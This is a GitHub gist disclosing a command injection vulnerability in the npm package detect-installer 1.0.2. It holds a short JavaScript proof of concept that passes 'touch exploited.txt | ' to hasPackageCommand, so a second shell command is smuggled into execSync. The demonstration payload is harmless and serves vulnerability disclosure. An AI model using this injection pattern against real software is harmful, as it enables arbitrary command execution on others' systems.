mcoimbra/detect-installer-1.0.2_poc.js

Last active October 29, 2023 12:23

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/mcoimbra/52f7ddedb887059fa5e7be5afa6c9d0c.js"></script>
Save mcoimbra/52f7ddedb887059fa5e7be5afa6c9d0c to your computer and use it in GitHub Desktop.

Download ZIP

Package detect-installer: Module detect-installer has the purpose of detecting an appropriate package manager to use but it enables command injection into child_process' execSync.

Raw

detect-installer-1.0.2_poc.js

	'use strict'

	const pkg = require('detect-installer');

	// This creates a local 'exploited.txt' file.
	pkg.hasPackageCommand('touch exploited.txt \| ');

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment